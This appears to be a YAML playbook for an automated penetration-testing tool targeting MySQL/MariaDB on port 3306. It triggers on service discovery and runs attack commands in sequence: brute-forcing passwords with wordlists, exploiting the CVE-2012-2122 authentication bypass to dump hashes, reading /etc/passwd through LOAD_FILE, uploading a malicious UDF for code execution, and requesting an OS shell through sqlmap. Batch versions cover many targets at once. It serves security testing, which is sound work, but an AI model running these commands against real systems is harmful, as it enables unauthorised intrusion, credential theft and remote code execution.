id: mysql_pentesting
name: MySQL/MariaDB Penetration Testing (Port 3306)
description: Comprehensive MySQL/MariaDB enumeration, authentication testing, and exploitation based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_mysql_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [3306, 33060] }
      protocol: { "$in": ["mysql", "tcp"] }
    required_count: 1
    priority: 5
    description: Triggers when MySQL/MariaDB service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: mysql_banner_grab
    name: MySQL Banner Grabbing
    description: Identify MySQL/MariaDB version and capabilities
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 3306 {host} -oN mysql_banner_{host}.txt"
        preferred: true
        notes: "Extract MySQL version and server details"
        requires_elevation: false
      - tool: nc
        platforms: [linux, macos]
        command: "nc -vn {host} 3306"
        preferred: false
        notes: "Simple banner grab with netcat"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-info {host}"
        preferred: true
        notes: "Detailed MySQL server information"
        requires_elevation: false

  - id: mysql_user_enum
    name: MySQL User Enumeration
    description: Enumerate MySQL users and databases
    order: 2
    timeout_seconds: 120
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-enum {host}"
        preferred: true
        notes: "Enumerate users, databases, and variables"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-databases --script-args mysqluser=root,mysqlpass='' {host}"
        preferred: false
        notes: "List databases with credentials"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-users --script-args mysqluser=root,mysqlpass='' {host}"
        preferred: false
        notes: "Enumerate MySQL users with credentials"
        requires_elevation: false

  - id: mysql_empty_password
    name: MySQL Empty/Default Password Check
    description: Test for empty root password and default credentials
    order: 3
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-empty-password {host}"
        preferred: true
        notes: "Check for MySQL accounts with empty passwords"
        requires_elevation: false
      - tool: mysql
        platforms: [linux, macos]
        command: "mysql -h {host} -u root -e 'SELECT version();'"
        preferred: true
        notes: "Test root login with no password"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_login; set RHOSTS {host}; set BLANK_PASSWORDS true; run; exit'"
        preferred: false
        notes: "Test for blank passwords on common accounts"
        requires_elevation: false

  - id: mysql_brute_force
    name: MySQL Brute Force Authentication
    description: Brute force MySQL credentials
    order: 4
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt mysql://{host} -t 4"
        preferred: true
        notes: "MySQL credential brute forcing"
        requires_elevation: false
      - tool: medusa
        platforms: [linux, macos, windows]
        command: "medusa -h {host} -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -M mysql -t 4"
        preferred: false
        notes: "Alternative brute force tool"
        requires_elevation: false
      - tool: ncrack
        platforms: [linux, macos, windows]
        command: "ncrack -p 3306 --user root -P /usr/share/wordlists/rockyou.txt {host}"
        preferred: false
        notes: "Fast MySQL authentication cracker"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/metasploit/unix_users.txt {host}"
        preferred: false
        notes: "Nmap MySQL brute force script"
        requires_elevation: false

  - id: mysql_vulnerabilities
    name: MySQL Vulnerability Scanning
    description: Scan for known MySQL vulnerabilities
    order: 5
    timeout_seconds: 180
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-vuln-* {host}"
        preferred: true
        notes: "Run all MySQL vulnerability scripts"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-vuln-cve2012-2122 {host}"
        preferred: true
        notes: "Check for authentication bypass (CVE-2012-2122)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Exploit CVE-2012-2122 authentication bypass"
        requires_elevation: false

  - id: mysql_audit
    name: MySQL Security Audit
    description: Audit MySQL configuration and security settings
    order: 6
    timeout_seconds: 120
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=root,mysql-audit.password=pass {host}"
        preferred: true
        notes: "Comprehensive MySQL security audit"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3306 --script mysql-variables,mysql-info {host}"
        preferred: false
        notes: "Enumerate MySQL variables and settings"
        requires_elevation: false

  - id: mysql_file_read
    name: MySQL Arbitrary File Read
    description: Test for FILE privilege exploitation (read local files)
    order: 7
    timeout_seconds: 120
    commands:
      - tool: mysql
        platforms: [linux, macos]
        command: "mysql -h {host} -u <user> -p<pass> -e \"SELECT LOAD_FILE('/etc/passwd');\""
        preferred: true
        notes: "Attempt to read /etc/passwd via LOAD_FILE() (requires FILE privilege)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/admin/mysql/mysql_sql; set RHOSTS {host}; set SQL SELECT LOAD_FILE(\"/etc/passwd\"); run; exit'"
        preferred: false
        notes: "Execute arbitrary SQL to read files"
        requires_elevation: false

  - id: mysql_udf_exploit
    name: MySQL UDF Privilege Escalation
    description: Test for UDF (User Defined Function) exploitation
    order: 8
    timeout_seconds: 180
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/multi/mysql/mysql_udf_payload; set RHOSTS {host}; set FORCE_UDF_UPLOAD true; run; exit'"
        preferred: true
        notes: "Upload malicious UDF for code execution (requires FILE privilege)"
        requires_elevation: false
      - tool: sqlmap
        platforms: [linux, macos, windows]
        command: "sqlmap -d 'mysql://user:pass@{host}:3306/database' --os-shell"
        preferred: false
        notes: "Attempt to get OS shell via SQL injection"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - mysql
    - hydra
    - medusa
    - metasploit
    - sqlmap
  cves:
    - CVE-2012-2122  # Authentication bypass via repeated login attempts
    - CVE-2016-6662  # MySQL privilege escalation
    - CVE-2016-6663  # Race condition privilege escalation
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql
    - https://www.exploit-db.com/docs/english/44139-mysql-udf-exploitation.pdf
  batch_commands:
    nmap_info: "nmap -p 3306 --script mysql-info -iL {targets_file} -oN mysql_info.txt"
    nmap_empty_pass: "nmap -p 3306 --script mysql-empty-password -iL {targets_file}"
    hydra: "hydra -L users.txt -P passwords.txt mysql://{targets} -t 4"
